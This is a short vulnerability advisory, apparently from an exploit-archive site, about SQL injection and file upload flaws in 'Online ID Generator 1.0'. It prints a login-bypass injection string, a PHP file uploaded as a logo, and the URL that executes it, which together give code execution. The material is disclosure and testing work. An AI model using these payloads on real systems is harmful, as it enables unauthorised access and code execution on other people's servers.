Online ID Generator 1.0 SQL Injection / Shell Upload

2023.08.31
Credit: nu11secur1ty
Risk: High
Local: No
Remote: Yes
CVE: N/A

## Title: Online-ID-Generator-1.0-SQLi-Bypass-login-ShellUpload-RCE ## Author: nu11secur1ty ## Date: 08/31/2023 ## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc ## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip ## Reference: https://portswigger.net/web-security/sql-injection ## Reference: https://portswigger.net/web-security/file-upload ## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: hat-trick: The system of this pseudo developer is vulnerable to SQLi, Shell Upload, and RCE at the same time. This system must be terminated. To all users who like and follow this person: Please STOPT DOING THIS! THIS WILL BE YOUR RESPONSIBLE WHEN YOU LOSE MONEY OR WHATEVER IMPORTANT FOR YOU! BR @nu11secur1ty STATUS: HIGH-CRITICAL Vulnerability [+]Bypass login SQLi: # In login form, for user: ```mysql nu11secur1ty' or 1=1# ``` [+]Shell Upload exploit: ## For system logo: ```php <?php phpinfo(); ?> ``` [+]RCE Exploit ## Execution from the remote browser: ```URLhttp://localhost/id_generator/uploads/1693471560_info.php ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html) ## Time spend: 00:10:00


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top